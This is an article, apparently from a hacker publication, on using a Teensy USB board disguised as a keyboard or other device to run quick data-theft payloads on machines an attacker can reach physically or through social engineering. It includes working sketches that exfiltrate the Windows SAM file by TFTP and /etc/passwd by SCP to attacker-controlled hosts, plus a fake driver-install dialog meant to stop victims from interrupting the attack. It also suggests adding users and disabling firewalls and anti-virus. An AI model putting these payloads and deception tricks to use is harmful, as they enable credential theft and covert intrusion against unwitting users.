Tactical Teensy Rapid Recon

by chap0  (contact.chap0@gmail.com)

The Teensy USB Development Board is a powerful piece of hardware.

With all of the awesome things that can be produced with it, even though I may not be using it to its full potential, it caught my attention when it made its debut with the Social Engineer Toolkit (SET) and keyboards being plugged into victim machines gaining a remote shell.  Of course, I thought this was awesome, but in the end I was not satisfied with SET automating all the work for me.

I wanted to know the code that was programming the Teensy device and the more uses that could come forth from it.  It was not a lack of understanding of which payloads I was choosing with SET and the execution of it all; it just did not feel unique, or as open minded.

In other words, everyone is "popping shell" nowadays!  Shell is great but what about long term?  What if the Teensy was leveraged more towards an information gathering tool for long term plots of attacks?  A good example is gathering credentials of users to use over time to gain access to do more information gathering, while being undetected because of the use of valid credentials.

I would like to see the Teensy utilized in such a way that an attack happens quickly and undetected, because even a Meterpreter shell can still be seen in logs with Meterpreter as the user agent.  But if an attacker would use FTP, TFTP, or even better SSH with commands for quick recon payloads, this will likely cause less attention.

Another great point is, with payloads such as the ones in SET, most require user interaction on the attacker's side.  What if you are a one man show?  You cannot be at two places at once.  If your shell gets killed before you can interact with it: game over for you, not the user.

With the Teensy, you can automate payloads to quickly upload certain files or folders from victim machines - no need for user interaction.  Don't get me wrong at all - SET is a great tool.  It is just great to see other pieces of code and the Teensy come together.

I will not be going into major details about the hardware specs, though I do believe that information is important.  Also, this was not meant to be a walk through of using or programming the Teensy device.

First off, the way I am utilizing the Teensy device will be with the Teensyduino add-on used with the Arduino software.  This allows us to run sketches (the name that Arduino uses for a program) on the Teensy device.

The Arduino programming language is based off of C and C++.  This also allows the Teensy to get utilized, disguised, and programmed as an USB HID (Human Interface Device), which makes this attack so successful because as soon as the device is plugged into the machine, it is recognized as a mouse or keyboard.

After this, it launches whatever commands an attacker programmed into it.  This is awesome.  The major problem is you must either social engineer someone to plug in a device or have physical access to the machine you wish to run your program on.

This may be simple to get around, as you can disguise the Teensy as a flash drive, keyboard, mouse, etc.  The options are endless with all the types of USB devices out on the market now.  Just buy something that is USB compatible and done.  At this point, the targets for an attacker are endless and the sky is really the limit on what she may want to deliver, depending on how much time an attacker wants to put into their code.

The Teensy can be utilized and programmed as if you were typing at the keyboard.  This makes things simple, fast, and reliable since the commands will probably run faster then you can type.

Some major benefits of the Teensy could be:

• Not much time to deliver attack, script out with the Teensy.
• Have physical access but do not want to cause too much attention.
• Teensy can be disguised as another device.

A major flaw:

• Must have physical access, but being creative can get around this because everyone wants a USB joystick...

So what would make it worthwhile for an attacker to utilize one of these devices in this manner?  As I mentioned, options can be endless.

For starters, if the machine you are attacking is a Windows machine running as admin user, you may be able to add your own user.  Or possibly disable settings or services such as firewall or anti-virus and configure other built-in services such as telnet to accompany that newly added user.

A good example for targeting a Linux box is gaining configuration files such as /etc/passwd which is readable by everyone.  You could create a custom payload that would copy this file and upload it via FTP to your server, which would enumerate the users on that machine.

Or you may want to snatch other configurations on a Linux machine that would be useful, such as certain settings on the machine (an example could be an Apache config file).

Files and services such as these are very valuable and gain a wealth of knowledge about the targeted environment or specific machine.  From here you could probably build attacks on top of attacks as well.  Instead of just launching one simple attack, you could launch multiple attacks in one shot, almost like chained attacks.

Code Examples

Here I have put together some very basic sample code that illustrates some examples that may be programmed to the Teensy.

In this code, it is clear to see what is being executed.

Basically, on the victim machine when this code is programmed to the Teensy device, it will utilize the TFTP protocol on Windows to upload the existing repair SAM file in the C:\WINDOWS\REPAIR directory, which most of the time contains the users' current usernames and passwords:

example.ino:

void setup() {} void loop () { delay(5000); CommandAtRunBar("cmd"); delay(5000); Keyboard.print("cd C:\\WINDOWS\\REPAIR\\\n"); delay(5000); Keyboard.print("tftp 192.168.0.3 PUT sam sam\n"); delay(9000000); } //From Irongeek for the commands on the keyboard... void CommandAtRunBar(char *SomeCommand){ Keyboard.set_modifier(128); //Windows key Keyboard.set_key1(KEY_R); // use r key Keyboard.send_now(); // send strokes Keyboard.set_modifier(0); //prep release of control keys Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times. Keyboard.send_now(); //Send the key changes delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }

In this code is an example payload targeting a Linux machine uploading /etc/passwd file via SCP to a remote server:

payload.ino:

void setup() {} void loop () { delay(5000); Command("konsole"); delay(8000); Keyboard.print("scp /etc/passwd chap0@192.168.0.8:/home/chap0/\r\n"); delay(5000); Keyboard.print("password\r\n"); delay(9000000); } void Command(char *SomeCommand){ Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F2); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(1500); Keyboard.print(SomeCommand); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); }

Other useful things that I have placed in other pieces of code (which is a good idea while you disguise the Teensy as another device) include creating a VBScript message box asking the user to "Wait while device drivers are installed" or anything along these lines.

This is extremely useful when you do not have control over exactly what is happening and you social engineer a user into plugging in the device, because if the device is interrupted, the program may not fully execute properly.

So inputting commands and echoing something along the lines of:

driver-install.vbs:

x=msgbox("Please wait while new device drivers are installed", 0+64, "Welcome to Driver Installer")

to a VBScript file before the payload is executed will hopefully fool a user enough to not interact with the machine while your payload is being delivered.

Hopefully, you received some good from this article.

In general, this just shows what kind of basic programs can be used with the Teensy to gather valuable information on a victim machine or environment.  It would be ideal to eventually gather plenty of small simple sketch-ups together and create a mini framework of Teensy payloads or something along those lines.

Maybe in the near future...

Resources

• Teensy or Teensy++ USB Development Board: www.pjrc.com/teensy
• The Teensy Loader Application: www.pjrc.com/teensy/loader.html  Used to communicate with the Teensy device.
• For Linux users, you must put the udev rules in /etc/udev/rules.d/ for the Teensy device: www.pjrc.com/teensy/00-teensy.rules
• Teensyduino Software Add-On: www.pjrc.com/teensy/teensyduino.html

Code: example.ino

Code: payload.ino

Code: driver-install.vbs